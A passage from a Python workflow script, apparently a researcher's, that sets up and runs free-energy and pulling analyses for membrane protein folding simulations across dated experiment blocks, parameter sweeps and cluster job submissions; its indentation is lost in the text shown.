for temp in temp_list:
if submode == "":
if folder == "stronger_bias_for_expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended":
do("make_metadata.py -m 18 -k 0.05")
else:
do("make_metadata.py -m 18 -k 0.02")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
cd("..")
cd("..")
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
for sample_range_mode in range(3):
freeEnergy_folder = f"nov_15_all_freeEnergy_calculation_sample_range_mode_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["memb_3_rg_0.1_lipid_1_topology"]
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode)
submode_list = [""]
cd(freeEnergy_folder)
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 18 -k 0.02")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 19")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "nov14":
if args.mode == 2:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
freeEnergy_folder = "nov_14_all_freeEnergy_calculation/"
folder_list = ["stronger_bias_for_expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder)
submode_list = [""]
cd(freeEnergy_folder)
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 18 -k 0.05")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 19")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
freeEnergy_folder = "all_freeEnergy_calculation_nov14/"
folder_list = ["next_gen_native_based_memb_3_rg_0.4_lipid_0.6_topology"]
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder)
submode_list = [""]
cd(freeEnergy_folder)
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 18")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 19")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
if args.day == "nov12":
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
freeEnergy_folder = "all_freeEnergy_calculation_nov11/"
folder_list = ["next_gen_native_based_memb_3_rg_0.4_lipid_0.6_extended"]
# for folder in folder_list:
# move_data(data_folder, freeEnergy_folder, folder)
submode_list = ["low_t_"]
cd(freeEnergy_folder)
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 18")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 19")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
if args.day == "nov11":
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
freeEnergy_folder = "all_freeEnergy_calculation_nov11/"
folder_list = ["next_gen_native_based_memb_3_rg_0.2_lipid_0.6_extended"]
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder)
submode_list = [""]
cd(freeEnergy_folder)
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 18")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
# elif submode == "low_t_":
# do("make_metadata.py -m 16")
# do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
cd("..")
cd("..")
if args.mode == 2:
temp_list = ["all"]
# bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
bias_list = {"1d_dis":"9"}
data_folder = "all_data_folder/"
freeEnergy_folder = "all_freeEnergy_calculation_nov11_2/"
folder_list = ["next_gen_native_based_memb_3_rg_0.2_lipid_0.6_extended"]
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, krg=1)
submode_list = [""]
cd(freeEnergy_folder)
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 19")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
# elif submode == "low_t_":
# do("make_metadata.py -m 16")
# do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
cd("..")
cd("..")
if args.day == "nov09":
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
freeEnergy_folder = "all_freeEnergy_calculation_nov09/"
folder_list = ["expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
# for folder in folder_list:
# move_data(data_folder, freeEnergy_folder, folder, krg=5, klipid=0.8, kgo=0.5)
submode_list = [""]
cd(freeEnergy_folder)
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 17")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 16")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
cd("..")
cd("..")
if args.day == "nov08":
if args.mode == 2:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
# bias_list = {"2d_qw_dis":"11"}
# bias_list = {"1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
freeEnergy_folder = "all_freeEnergy_calculation/"
# folder = "rgWidth_memb_3_rg_0.1_lipid_1_extended"
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_topology",
"expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended",
"rgWidth_memb_3_rg_0.1_lipid_1_topology",
"expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
# for folder in folder_list:
# move_data(data_folder, freeEnergy_folder, folder)
submode_list = ["", "low_t_"]
cd("all_freeEnergy_calculation")
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 17")
do("pulling_analysis.py -m {} --commons 0 --nsample 2500 --submode 2".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 16")
do("pulling_analysis.py -m {} --commons 0 --nsample 2500 --submode 3".format(mode))
cd("..")
cd("..")
if args.mode == 1:
pre = "/scratch/wl45/nov_2017/06nov/"
data_folder = "/scratch/wl45/nov_2017/06nov/all_data_folder/"
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended",
"rgWidth_memb_3_rg_0.1_lipid_1_topology",
"expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
process_temper_data(pre, data_folder, folder_list)
if args.day == "nov07":
if args.mode == 5:
scancel_jobs_in_folder(".")
if args.mode == 4:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
# bias_list = {"2d_qw_dis":"11"}
# bias_list = {"1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
freeEnergy_folder = "all_freeEnergy_calculation/"
# folder = "rgWidth_memb_3_rg_0.1_lipid_1_extended"
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_topology",
"expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended",
"rgWidth_memb_3_rg_0.1_lipid_1_topology",
"expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
# for folder in folder_list:
# move_data(data_folder, freeEnergy_folder, folder)
submode_list = ["", "low_t_"]
cd("all_freeEnergy_calculation")
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
# do("make_metadata.py -m 16")
do("pulling_analysis.py -m {} --commons 0 --nsample 2500 --submode 2".format(mode))
cd("..")
cd("..")
if args.mode == 3:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
# bias_list = {"2d_qw_dis":"11"}
# bias_list = {"1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
freeEnergy_folder = "all_freeEnergy_calculation/"
# folder = "rgWidth_memb_3_rg_0.1_lipid_1_extended"
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_topology",
"expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder)
cd("all_freeEnergy_calculation")
for folder in folder_list:
cd(folder)
for bias, mode in bias_list.items():
do("mkdir -p " + bias)
cd(bias)
for temp in temp_list:
do("make_metadata.py -m 15")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
cd("..")
cd("..")
if args.mode == 2:
data_folder = "all_data_folder/"
freeEnergy_folder = "all_freeEnergy_calculation/"
folder = "rgWidth_memb_3_rg_0.1_lipid_1_extended"
move_data(data_folder, freeEnergy_folder, folder)
if args.mode == 1:
pre = "/scratch/wl45/nov_2017/06nov/"
data_folder = "/scratch/wl45/nov_2017/06nov/all_data_folder/"
folder_list = [
"expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"
]
process_temper_data(pre, data_folder, folder_list)
if args.day == "nov05":
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
# bias_list = {"2d_qw_dis":"11"}
# bias_list = {"1d_dis":"9", "1d_qw":"10"}
for bias, mode in bias_list.items():
do("mkdir -p " + bias)
cd(bias)
for temp in temp_list:
do("make_metadata.py -m 12")
do("mkdir t_" + temp)
do("mv metadatafile t_" + temp)
cd("t_" + temp)
do("pulling_analysis.py -m {} --commons 0 --nsample 2500 --submode 1".format(mode))
cd("..")
cd("..")
# cmd = "find -name 'slurm-*' | rev | awk -F'[-.]' '{print $2}' | rev"
# lines = getFromTerminal(cmd).splitlines()
# for line in lines:
# print(line)
# do("scancel " + line)
if args.day == "oct31":
if args.mode == 4:
# folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
folder_list = ["memb_3_rg_0.1_lipid_1_extended", "memb_3_rg_0.1_lipid_1_topology"]
# folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended", "rgWidth_memb_3_rg_0.1_lipid_1_topology"]
# folder_list = ["more_higher_temp_topology"]
temp_list = ["all", "500"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
for folder in folder_list:
cd(folder)
for bias, mode in bias_list.items():
do("mkdir -p " + bias)
cd(bias)
for temp in temp_list:
if temp != "all":
do("make_metadata.py -m 10 --submode 3 -t " + temp)
else:
do("make_metadata.py -m 9 --submode 3")
do("mkdir t_" + temp)
do("mv metadatafile t_" + temp)
cd("t_" + temp)
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 1".format(mode))
cd("..")
cd("..")
cd("..")
if args.mode == 3:
# folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
# folder_list = ["memb_2_rg_0.1_lipid_1_extended", "memb_2_rg_0.1_lipid_1_topology"]
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended", "rgWidth_memb_3_rg_0.1_lipid_1_topology"]
# folder_list = ["more_higher_temp_topology"]
temp_list = ["all", "500"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
for folder in folder_list:
cd(folder)
for bias, mode in bias_list.items():
do("mkdir -p " + bias)
cd(bias)
for temp in temp_list:
if temp != "all":
do("make_metadata.py -m 10 --submode 3 -t " + temp)
else:
do("make_metadata.py -m 9 --submode 3")
do("mkdir t_" + temp)
do("mv metadatafile t_" + temp)
cd("t_" + temp)
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 1".format(mode))
cd("..")
cd("..")
cd("..")
if args.mode == 2:
# folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
# folder_list = ["memb_2_rg_0.1_lipid_1_extended", "memb_2_rg_0.1_lipid_1_topology"]
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended", "rgWidth_memb_3_rg_0.1_lipid_1_topology"]
# folder_list = ["more_higher_temp_topology"]
temp_list = ["all", "500"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
for folder in folder_list:
cd(folder)
for bias, mode in bias_list.items():
do("rm -r " + bias)
cd("..")
if args.mode == 1:
# folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
# folder_list = ["memb_2_rg_0.1_lipid_1_extended", "memb_2_rg_0.1_lipid_1_topology"]
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended", "rgWidth_memb_3_rg_0.1_lipid_1_topology"]
# folder_list = ["more_higher_temp_topology"]
temp_list = ["all", "500"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
for folder in folder_list:
cd(folder)
for bias, mode in bias_list.items():
do("mkdir -p " + bias)
cd(bias)
for temp in temp_list:
if temp != "all":
do("make_metadata.py -m 10 --submode 1 -t " + temp)
else:
do("make_metadata.py -m 9 --submode 1")
do("mkdir t_" + temp)
do("mv metadatafile t_" + temp)
cd("t_" + temp)
do("pulling_analysis.py -m {} --commons 0 --nsample 2500 --submode 1".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "oct28":
if args.mode == 1:
# folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
# folder_list = ["memb_2_rg_0.1_lipid_1_extended", "memb_2_rg_0.1_lipid_1_topology"]
folder_list = ["memb_3_rg_0.1_lipid_1_extended", "memb_3_rg_0.1_lipid_1_topology"]
# folder_list = ["more_higher_temp_topology"]
temp_list = ["all", "500"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
for folder in folder_list:
cd(folder)
for bias, mode in bias_list.items():
do("mkdir -p " + bias)
cd(bias)
for temp in temp_list:
if temp != "all":
do("make_metadata.py -m 10 --submode 1 -t " + temp)
else:
do("make_metadata.py -m 9 --submode 1")
do("mkdir t_" + temp)
do("mv metadatafile t_" + temp)
cd("t_" + temp)
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 1".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "oct25":
if args.mode == 1:
compute_theta_for_each_helix()
print("Done")
if args.mode == 2:
# folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
# folder_list = ["memb_2_rg_0.1_lipid_1_extended", "memb_2_rg_0.1_lipid_1_topology"]
folder_list = ["memb_3_rg_0.1_lipid_1_extended", "memb_3_rg_0.1_lipid_1_topology"]
# folder_list = ["more_higher_temp_topology"]
temp_list = ["all", "500"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
for folder in folder_list:
cd(folder)
for bias, mode in bias_list.items():
do("mkdir -p " + bias)
cd(bias)
for temp in temp_list:
if temp != "all":
do("make_metadata.py -m 10 -t " + temp)
else:
do("make_metadata.py -m 9")
do("mkdir t_" + temp)
do("mv metadatafile t_" + temp)
cd("t_" + temp)
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 1".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "oct24":
if args.mode == 2:
cmd = 'tail -n 1 log.lammps | cut -d" " -f2-'
line = getFromTerminal(cmd).rstrip()
print(line)
if args.mode == 1:
dis_list = glob.glob("dis_*")
print(dis_list)
for dis in dis_list:
cd(dis)
do("cp log0/log.lammps .")
continueRunConvertion()
# do("mkdir log0")
# do("mv log.* log0/")
# do("mkdir 1")
do("sed 's/2xov_0/2xov_1/g' run_0.slurm > run_1.slurm")
do("sbatch run_1.slurm")
cd("..")
# continueRunConvertion()
if args.day == "oct21":
if args.mode == 1:
# folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
# folder_list = ["memb_2_rg_0.1_lipid_1_extended", "memb_2_rg_0.1_lipid_1_topology"]
folder_list = ["memb_3_rg_0.1_lipid_1_extended", "memb_3_rg_0.1_lipid_1_topology"]
# folder_list = ["more_higher_temp_topology"]
temp_list = ["all", "450"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
for folder in folder_list:
cd(folder)
for bias, mode in bias_list.items():
do("mkdir -p " + bias)
cd(bias)
for temp in temp_list:
if temp != "all":
do("make_metadata.py -m 10 -t " + temp)
else:
do("make_metadata.py -m 9")
do("mkdir t_" + temp)
do("mv metadatafile t_" + temp)
cd("t_" + temp)
do("pulling_analysis.py -m {} --commons 0 --nsample 2500".format(mode))
cd("..")
cd("..")
cd("..")
if args.mode == 2:
# folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
folder_list = ["memb_2_rg_0.1_lipid_1_extended", "memb_2_rg_0.1_lipid_1_topology"]
# folder_list = ["more_higher_temp_topology"]
temp_list = ["important_all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
for folder in folder_list:
cd(folder)
for bias, mode in bias_list.items():
do("mkdir -p " + bias)
cd(bias)
for temp in temp_list:
do("make_metadata.py -m 9")
do("rm t_t_" +temp)
do("mkdir -p t_t_" + temp)
do("mv metadatafile t_t_" + temp)
cd("t_t_" + temp)
do("pulling_analysis.py -m {} --commons 0 --nsample 2500".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "oct17":
if args.mode == 1:
print("can it fold")
# start_from_list=["native", "extended", "topology"]
# start_from_list=["native"]
start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0, 1, 2]
force_ramp_rate_list=[1]
temperature_list=[350, 500]
memb_k_list = [1, 2, 4]
rg_list = [0, 0.1, 0.4]
force_list = [0.0]
repeat = 2
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat,
commons=1)
if args.day == "oct16":
if args.mode == 1:
# folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
folder_list = ["more_higher_temp"]
# folder_list = ["more_higher_temp_topology"]
temp_list = ["all", "350", "400", "450", "500"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
for folder in folder_list:
cd(folder)
for bias, mode in bias_list.items():
do("mkdir -p " + bias)
cd(bias)
for temp in temp_list:
if temp != "all":
do("make_metadata.py -m 10 -t " + temp)
else:
do("make_metadata.py -m 9")
do("mkdir t" + temp)
do("mv metadatafile t" + temp)
cd("t" + temp)
do("pulling_analysis.py -m {} --commons 1 --nsample 4000".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "oct13":
if args.mode == 2:
print("strong membrane fore ramp")
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
# start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [1, 2]
force_ramp_rate_list=[1]
temperature_list=[350]
memb_k_list = [1, 2, 4, 8, 16]
rg_list = [0, 0.4]
force_list = [0.0]
repeat = 10
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat,
commons=0)
if args.mode == 1:
folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
temp_list = ["all", "350", "400", "450", "500"]
for folder in folder_list:
cd(folder)
do("mkdir -p 2d_qw_dis")
cd("2d_qw_dis")
for temp in temp_list:
if temp != "all":
do("make_metadata.py -m 10 -t " + temp)
else:
do("make_metadata.py -m 9")
do("mkdir t" + temp)
do("mv metadatafile t" + temp)
cd("t" + temp)
do("pulling_analysis.py -m 11 --commons 1")
cd("..")
cd("..")
cd("..")
if args.day == "oct12":
if args.mode == 1:
temp_list = ["400", "450", "500", "all"]
for temp in temp_list:
if temp != "all":
do("make_metadata.py -m 10 -t " + temp)
else:
do("make_metadata.py -m 9")
do("mkdir t" + temp)
do("mv metadatafile t" + temp)
cd("t" + temp)
do("pulling_analysis.py -m 9")
cd("..")
if args.mode == 2:
folder_list = ["rg_0.4_lipid_2_extended", "rg_0.4_lipid_2_topology"]
temp_list = ["350", "400", "450", "500", "all"]
for folder in folder_list:
cd(folder)
# do("mkdir -p 1d_dis")
# cd("1d_dis")
# for temp in temp_list:
# if temp != "all":
# do("make_metadata.py -m 10 -t " + temp)
# else:
# do("make_metadata.py -m 9")
# do("mkdir t" + temp)
# do("mv metadatafile t" + temp)
# cd("t" + temp)
# do("pulling_analysis.py -m 9")
# cd("..")
# cd("..")
do("mkdir -p 1d_qw")
cd("1d_qw")
for temp in temp_list:
if temp != "all":
do("make_metadata.py -m 10 -t " + temp)
else:
do("make_metadata.py -m 9")
do("mkdir t" + temp)
do("mv metadatafile t" + temp)
cd("t" + temp)
do("pulling_analysis.py -m 10")
cd("..")
cd("..")
cd("..")
if args.mode == 3:
print("high temp refold")
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
# start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [2]
force_ramp_rate_list=[1000]
temperature_list=[100]
memb_k_list = [1, 2, 4, 8, 16, 32]
rg_list = [0.4]
force_list = [0.0]
repeat = 1
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat,
commons=1)
if args.day == "oct10":
if args.mode == 5:
do("mkdir combined")
cd("combined")
do("make_metadata.py -m 9")
do("pulling_analysis.py -m 9 --commons 1")
if args.mode == 4:
temp_list = [350, 400, 450, 500]
for temp in temp_list:
do("mkdir t" + str(temp))
cd("t" + str(temp))
do("make_metadata.py -m 10 -t {}".format(temp))
do("pulling_analysis.py -m 9 --commons 1")
cd("..")
if args.mode == 3:
do("make_metadata.py -m 10 -t 400")
do("pulling_analysis.py -m 9")
if args.mode == 2:
print("high temp refold")
start_from_list=["native", "extended", "topology"]
# start_from_list=["native"]
# start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [2]
force_ramp_rate_list=[1]
temperature_list=[500, 550, 600]
memb_k_list = [1]
rg_list = [0.4]
force_list = [0.0]
repeat = 50
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat)
if args.mode == 1:
fold_list = ["rg_0.4_lipid_2_temp_300_extended", "rg_0.4_lipid_2_temp_300_topology",
"rg_0.4_lipid_2_temp_400_extended", "rg_0.4_lipid_2_temp_400_topology"]
for folder in fold_list:
cd(folder)
cd("simulation")
do("pulling_prepare.py -m 8 --submode 1")
cd("..")
do("mkdir freeEnergy_2")
cd("freeEnergy_2")
do("make_metadata.py -m 3 -k 0.02 -t 300 --submode 1")
do("pulling_analysis.py -m 6")
cd("../..")
if args.day == "oct05":
if args.mode == 5:
print("no go, constant force, refold")
# start_from_list=["native", "extended", "topology"]
# start_from_list=["native"]
start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [2]
force_ramp_rate_list=[0.5]
temperature_list=[400]
memb_k_list = [0, 1, 2, 4]
rg_list = [0.4]
force_list = [0.0]
repeat = 10
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat)
# # start_from_list=["native", "extended", "topology"]
# # start_from_list=["native"]
# start_from_list=["extended", "topology"]
# mode_list = [3] # lipid mediated interaction
# # pressure_list = [0, 0.1, 1.0]
# pressure_list = [0, 2]
# force_ramp_rate_list=[0.5]
# temperature_list=[400]
# memb_k_list = [0, 1, 2, 4]
# rg_list = [0, 0.4]
# force_list = [0.0]
# repeat = 10
# variable_test(temperature_list=temperature_list,
# start_from_list=start_from_list,
# rg_list=rg_list,
# memb_k_list=memb_k_list,
# mode_list=mode_list,
# pressure_list=pressure_list,
# force_ramp_rate_list=force_ramp_rate_list,
# force_list=force_list,
# repeat=repeat)
if args.mode == 4:
print("membrane effect")
# start_from_list=["native", "extended", "topology"]
start_from_list=["native"]
# start_from_list=["extended", "topology"]
mode_list = [3] # lipid mediated interaction
# pressure_list = [0, 0.1, 1.0]
pressure_list = [0, 0.1, 1, 2]
force_ramp_rate_list=[100]
temperature_list=[200, 300, 400, 500]
memb_k_list = [1, 2, 4, 8, 16]
rg_list = [0, 0.08, 0.4]
force_list =["ramp"]
repeat = 2
variable_test(temperature_list=temperature_list,
start_from_list=start_from_list,
rg_list=rg_list,
memb_k_list=memb_k_list,
mode_list=mode_list,
pressure_list=pressure_list,
force_ramp_rate_list=force_ramp_rate_list,
force_list=force_list,
repeat=repeat)
if args.mode == 1:
fold_list = ["rg_0.4_lipid_2_temp_300_extended", "rg_0.4_lipid_2_temp_300_topology",
"rg_0.4_lipid_2_temp_400_extended", "rg_0.4_lipid_2_temp_400_topology"]
for folder in fold_list:
cd(folder)
cd("simulation")
do("pulling_prepare.py -m 8 --submode 1")
cd("..")
do("mkdir freeEnergy_2")
cd("freeEnergy_2")
do("make_metadata.py -m 3 -k 0.02 -t 300 --submode 1")
do("pulling_analysis.py -m 6")
cd("../..")
if args.mode == 2:
print("2d wham")
# cd("simulation")
# do("pulling_prepare.py -m 8")
# cd("..")
fold_list = ["rg_0.4_lipid_2_temp_300_extended", "rg_0.4_lipid_2_temp_300_topology",
"rg_0.4_lipid_2_temp_400_extended", "rg_0.4_lipid_2_temp_400_topology"]
for folder in fold_list:
cd(folder)
name = "wham2d"
do("mkdir {}".format(name))
cd(name)
do("make_metadata.py -m 3 -k 0.02 -t 300 --submode 1")
do("pulling_analysis.py -m 5")
cd("../..")
if args.mode == 3:
print("qw wham")
# cd("simulation")
# do("pulling_prepare.py -m 8")
# cd("..")
fold_list = ["rg_0.4_lipid_2_temp_300_extended", "rg_0.4_lipid_2_temp_300_topology",
"rg_0.4_lipid_2_temp_400_extended", "rg_0.4_lipid_2_temp_400_topology"]
for folder in fold_list:
cd(folder)
name = "qw_2"
do("mkdir {}".format(name))
cd(name)
do("make_metadata.py -m 3 -k 0.02 -t 300 --submode 1")
